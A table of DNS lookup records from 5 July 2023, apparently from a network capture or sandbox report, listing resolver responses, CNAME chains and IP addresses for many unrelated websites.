                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.189783096 CEST8.8.8.8192.168.2.60x3632No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.189783096 CEST8.8.8.8192.168.2.60x3632No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.189783096 CEST8.8.8.8192.168.2.60x3632No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.207978010 CEST8.8.8.8192.168.2.60x62d2Server failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.318440914 CEST8.8.8.8192.168.2.60xd7c8No error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.371879101 CEST8.8.8.8192.168.2.60x592dNo error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.371879101 CEST8.8.8.8192.168.2.60x592dNo error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.371879101 CEST8.8.8.8192.168.2.60x592dNo error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.398798943 CEST8.8.8.8192.168.2.60x4e96No error (0)www.rs-ag.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.398798943 CEST8.8.8.8192.168.2.60x4e96No error (0)www.rs-ag.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.400073051 CEST8.8.8.8192.168.2.60x3d58No error (0)www.alteor.clcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.400073051 CEST8.8.8.8192.168.2.60x3d58No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.400073051 CEST8.8.8.8192.168.2.60x3d58No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.665008068 CEST8.8.8.8192.168.2.60x551dNo error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.665008068 CEST8.8.8.8192.168.2.60x551dNo error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.730398893 CEST8.8.8.8192.168.2.60x3783No error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.730398893 CEST8.8.8.8192.168.2.60x3783No error (0)ghs.googlehosted.com172.217.16.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:48.738209963 CEST8.8.8.8192.168.2.60xf5fbNo error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.292969942 CEST8.8.8.8192.168.2.60x5d6bNo error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.292969942 CEST8.8.8.8192.168.2.60x5d6bNo error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.292969942 CEST8.8.8.8192.168.2.60x5d6bNo error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.294835091 CEST8.8.8.8192.168.2.60xc76cName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.303494930 CEST8.8.8.8192.168.2.60x3a44No error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.398991108 CEST8.8.8.8192.168.2.60x96deNo error (0)www.petsfan.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.398991108 CEST8.8.8.8192.168.2.60x96deNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.398991108 CEST8.8.8.8192.168.2.60x96deNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.398991108 CEST8.8.8.8192.168.2.60x96deNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.419290066 CEST8.8.8.8192.168.2.60x8322No error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.419290066 CEST8.8.8.8192.168.2.60x8322No error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.491769075 CEST8.8.8.8192.168.2.60xeb8dNo error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.491769075 CEST8.8.8.8192.168.2.60xeb8dNo error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.559493065 CEST8.8.8.8192.168.2.60xb17No error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.562824011 CEST8.8.8.8192.168.2.60x7464No error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.562824011 CEST8.8.8.8192.168.2.60x7464No error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.584136009 CEST8.8.8.8192.168.2.60x7429Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.824825048 CEST8.8.8.8192.168.2.60xa873No error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.824825048 CEST8.8.8.8192.168.2.60xa873No error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.923650980 CEST8.8.8.8192.168.2.60x6886No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.000164032 CEST8.8.8.8192.168.2.60x2cdbNo error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.000164032 CEST8.8.8.8192.168.2.60x2cdbNo error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.070050955 CEST8.8.8.8192.168.2.60x3887No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.070050955 CEST8.8.8.8192.168.2.60x3887No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.474494934 CEST8.8.8.8192.168.2.60xe306No error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.474494934 CEST8.8.8.8192.168.2.60xe306No error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.560359955 CEST8.8.8.8192.168.2.60xd855No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.560359955 CEST8.8.8.8192.168.2.60xd855No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.581984043 CEST8.8.8.8192.168.2.60x5485No error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.581984043 CEST8.8.8.8192.168.2.60x5485No error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.840090990 CEST8.8.8.8192.168.2.60xef14No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.840090990 CEST8.8.8.8192.168.2.60xef14No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.964725018 CEST8.8.8.8192.168.2.60x987bNo error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.964725018 CEST8.8.8.8192.168.2.60x987bNo error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.006616116 CEST8.8.8.8192.168.2.60x3831No error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.006664991 CEST8.8.8.8192.168.2.60xc54cNo error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.006664991 CEST8.8.8.8192.168.2.60xc54cNo error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.006833076 CEST8.8.8.8192.168.2.60x497dName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.067739964 CEST8.8.8.8192.168.2.60xd488No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.070251942 CEST8.8.8.8192.168.2.60x1549Server failure (2)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.119580030 CEST8.8.8.8192.168.2.60xd488No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.206279993 CEST8.8.8.8192.168.2.60x9aa0No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.225637913 CEST8.8.8.8192.168.2.60xe95dNo error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.511010885 CEST8.8.8.8192.168.2.60x98f1No error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.617120981 CEST8.8.8.8192.168.2.60x8f32No error (0)www.netcr.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.617120981 CEST8.8.8.8192.168.2.60x8f32No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.617120981 CEST8.8.8.8192.168.2.60x8f32No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.617120981 CEST8.8.8.8192.168.2.60x8f32No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.805749893 CEST8.8.8.8192.168.2.60x9cfbNo error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.884515047 CEST8.8.8.8192.168.2.60xf301No error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.885574102 CEST8.8.8.8192.168.2.60xf78aNo error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.094594002 CEST8.8.8.8192.168.2.60x811dNo error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.094594002 CEST8.8.8.8192.168.2.60x811dNo error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.094594002 CEST8.8.8.8192.168.2.60x811dNo error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.109879017 CEST8.8.8.8192.168.2.60x1549Server failure (2)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.316699982 CEST8.8.8.8192.168.2.60x9fb0No error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.472233057 CEST8.8.8.8192.168.2.60x1b34No error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.523821115 CEST8.8.8.8192.168.2.60x5443No error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.523821115 CEST8.8.8.8192.168.2.60x5443No error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.523821115 CEST8.8.8.8192.168.2.60x5443No error (0)d2kt7vovxa5e81.cloudfront.net108.157.177.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.523821115 CEST8.8.8.8192.168.2.60x5443No error (0)d2kt7vovxa5e81.cloudfront.net108.157.177.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.523821115 CEST8.8.8.8192.168.2.60x5443No error (0)d2kt7vovxa5e81.cloudfront.net108.157.177.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.523821115 CEST8.8.8.8192.168.2.60x5443No error (0)d2kt7vovxa5e81.cloudfront.net108.157.177.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.764034033 CEST8.8.8.8192.168.2.60xde33No error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.764034033 CEST8.8.8.8192.168.2.60xde33No error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.902967930 CEST8.8.8.8192.168.2.60x9b74No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:55.124372959 CEST8.8.8.8192.168.2.60x1549Server failure (2)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:55.143315077 CEST8.8.8.8192.168.2.60xd5b0No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:55.196309090 CEST8.8.8.8192.168.2.60x56e3No error (0)www.x0c.com185.53.177.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:55.341975927 CEST8.8.8.8192.168.2.60xa722No error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:55.467914104 CEST8.8.8.8192.168.2.60x8102No error (0)www.dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:55.467914104 CEST8.8.8.8192.168.2.60x8102No error (0)www.dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:55.709630013 CEST8.8.8.8192.168.2.60x2e8eName error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:55.717725992 CEST8.8.8.8192.168.2.60xbe22No error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.026982069 CEST8.8.8.8192.168.2.60x7b20No error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.043309927 CEST8.8.8.8192.168.2.60x92b1No error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.043309927 CEST8.8.8.8192.168.2.60x92b1No error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.043309927 CEST8.8.8.8192.168.2.60x92b1No error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.048858881 CEST8.8.8.8192.168.2.60x901eNo error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.048858881 CEST8.8.8.8192.168.2.60x901eNo error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.012978077 CEST8.8.8.8192.168.2.60xf59dNo error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.212374926 CEST8.8.8.8192.168.2.60x6466No error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.248091936 CEST8.8.8.8192.168.2.60x877No error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.347106934 CEST8.8.8.8192.168.2.60xe9d2No error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.347106934 CEST8.8.8.8192.168.2.60xe9d2No error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.347106934 CEST8.8.8.8192.168.2.60xe9d2No error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.272197962 CEST8.8.8.8192.168.2.60x2beeNo error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.272197962 CEST8.8.8.8192.168.2.60x2beeNo error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.272197962 CEST8.8.8.8192.168.2.60x2beeNo error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.272197962 CEST8.8.8.8192.168.2.60x2beeNo error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.272197962 CEST8.8.8.8192.168.2.60x2beeNo error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.3.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.617269039 CEST8.8.8.8192.168.2.60xec46No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.617269039 CEST8.8.8.8192.168.2.60xec46No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.617269039 CEST8.8.8.8192.168.2.60xec46No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.731067896 CEST8.8.8.8192.168.2.60xc2c8No error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.851654053 CEST8.8.8.8192.168.2.60x7f09No error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.851654053 CEST8.8.8.8192.168.2.60x7f09No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.851654053 CEST8.8.8.8192.168.2.60x7f09No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.091640949 CEST8.8.8.8192.168.2.60x4a86No error (0)www.wifi4all.nl188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.091640949 CEST8.8.8.8192.168.2.60x4a86No error (0)www.wifi4all.nl188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.460614920 CEST8.8.8.8192.168.2.60x176dNo error (0)www.fcwcvt.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.460614920 CEST8.8.8.8192.168.2.60x176dNo error (0)www.fcwcvt.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.746447086 CEST8.8.8.8192.168.2.60x3a98No error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.093238115 CEST8.8.8.8192.168.2.60x9990No error (0)www.snugpak.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.093238115 CEST8.8.8.8192.168.2.60x9990No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.322288036 CEST8.8.8.8192.168.2.60x5b1dNo error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.447494030 CEST8.8.8.8192.168.2.60x7768No error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.690506935 CEST8.8.8.8192.168.2.60xb14eNo error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.690506935 CEST8.8.8.8192.168.2.60xb14eNo error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.704826117 CEST8.8.8.8192.168.2.60x657eNo error (0)www.koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.125195026 CEST8.8.8.8192.168.2.60xea7No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:02.597677946 CEST8.8.8.8192.168.2.60x3a98Server failure (2)www.vazir.senonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:03.593450069 CEST8.8.8.8192.168.2.60x3a98Server failure (2)www.vazir.senonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:03.593506098 CEST8.8.8.8192.168.2.60x657eServer failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:04.468708038 CEST8.8.8.8192.168.2.60x337dNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:04.641113043 CEST8.8.8.8192.168.2.60x657eServer failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.080194950 CEST8.8.8.8192.168.2.60xe866No error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.153255939 CEST8.8.8.8192.168.2.60x6a82No error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.153255939 CEST8.8.8.8192.168.2.60x6a82No error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.153255939 CEST8.8.8.8192.168.2.60x6a82No error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.153255939 CEST8.8.8.8192.168.2.60x6a82No error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.153255939 CEST8.8.8.8192.168.2.60x6a82No error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.614156961 CEST8.8.8.8192.168.2.60x10c4No error (0)www.cokocoko.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.614156961 CEST8.8.8.8192.168.2.60x10c4No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.614156961 CEST8.8.8.8192.168.2.60x10c4No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.614156961 CEST8.8.8.8192.168.2.60x10c4No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.772119045 CEST8.8.8.8192.168.2.60xdb12No error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.998121023 CEST8.8.8.8192.168.2.60x5732No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.593519926 CEST8.8.8.8192.168.2.60x81e0No error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.593519926 CEST8.8.8.8192.168.2.60x81e0No error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.593519926 CEST8.8.8.8192.168.2.60x81e0No error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.686043978 CEST8.8.8.8192.168.2.60x3806No error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
